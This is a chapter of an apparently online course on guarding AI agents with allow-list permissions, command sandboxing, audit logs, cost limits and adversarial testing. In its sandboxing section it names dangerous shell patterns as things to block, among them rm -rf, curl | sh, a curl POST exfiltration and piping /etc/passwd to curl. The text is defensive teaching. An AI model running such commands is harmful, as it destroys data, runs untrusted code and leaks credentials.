4 min

Safety & Guardrails

Permissions, Sandboxing & Audit

Defense-in-Depth for AI Agents

No single safety measure is enough. A firewall without monitoring is blind. An audit log without permission rules is just a record of damage. Defense-in-depth means layering multiple protections so that no single failure can cause serious harm.

For AI agents, the layers are: permission rules, command sandboxing, audit logging, and cost controls.

Layer 1: Permission Rules

Permission rules define what the agent is allowed to do. There are two philosophies:

Approach	How It Works	Safety Level
Block-list	Allow everything except what's listed	Weak — you can't anticipate every dangerous action
Allow-list	Block everything except what's listed	Strong — agent can only do what you explicitly permit

Always use allow-lists. With a block-list, you have to think of every possible dangerous command. With an allow-list, the agent can only do what you've explicitly approved.

Your safety-rules.json uses an allow-list approach:

Allowed directories are explicitly listed

Allowed commands are explicitly listed

Everything else is denied by default

Layer 2: Command Sandboxing

Even with permission rules, shell commands deserve extra scrutiny. An agent with shell access can:

Delete files (rm -rf)

Change permissions (chmod 777)

Download and execute code (curl | sh)

Exfiltrate data (curl -X POST with your files as payload)

Command sandboxing restricts *which* shell commands the agent can run and *how*:

Command allow-list — only ls, cat, mkdir, cp, mv (no rm, curl, chmod)

Argument validation — even allowed commands can be dangerous with wrong arguments (cp to a system directory)

No pipe chains — prevent cat /etc/passwd | curl ...

No shell expansion — prevent rm -rf $HOME where $HOME expands unexpectedly

Layer 3: Audit Logging

Every action the agent takes must be logged. The audit log serves three purposes:

Forensics — what happened, when, and why (after something goes wrong)

Monitoring — real-time visibility into what the agent is doing (detect problems early)

Accountability — proof that the agent followed its safety rules (or didn't)

A good audit log entry includes:

Field	Purpose
`timestamp`	When the action occurred
`action`	What the agent did (e.g., "file_move", "api_call")
`category`	Action type (read, write, delete, network, shell)
`target`	What was acted on (file path, URL, command)
`result`	Success, failure, or denied
`reasoning`	Why the agent chose this action

Review your audit logs regularly. An agent that reads ~/.ssh/id_rsa on every run is a red flag even if it's technically allowed.

Layer 4: Cost Controls

API-based agents spend money on every request. Without cost controls:

A loop bug can send thousands of API calls in minutes

A verbose agent can use 10x more tokens than necessary

A multi-step workflow can chain expensive calls

Cost controls to implement:

Per-request limit — max tokens per single API call

Per-run limit — total budget for one agent task execution

Per-day limit — hard cap on daily spending

Alert thresholds — notifications at 50%, 80%, and 95% of limits

Testing Your Guardrails

The most important step: try to break your own safety system. Adversarial testing means:

Try to access a blocked directory — does the agent refuse?

Try to run a blocked command — does the permission check catch it?

Try to exceed cost limits — does the budget cap trigger?

Check the audit log — are all attempts (including denied ones) recorded?

If you can break your guardrails, so can a confused LLM. Fix the gap before it matters.

Key Takeaways

Defense-in-depth: layer permission rules, sandboxing, audit logging, and cost controls.

Always use allow-lists over block-lists — you can't anticipate every dangerous action.

Log every action, including denied attempts. Review logs regularly for anomalies.

Cost controls prevent runaway API spending from loops and verbose agents.

Test your guardrails adversarially — try to break them before deploying.

This is chapter 3 of Open Source AI Agents (OpenClaw).

Get the full hands-on course — free during early access. Build the complete system. Your projects become your portfolio.

View course details

Ch. 2: Install & Configure

Ch. 4: Custom Tools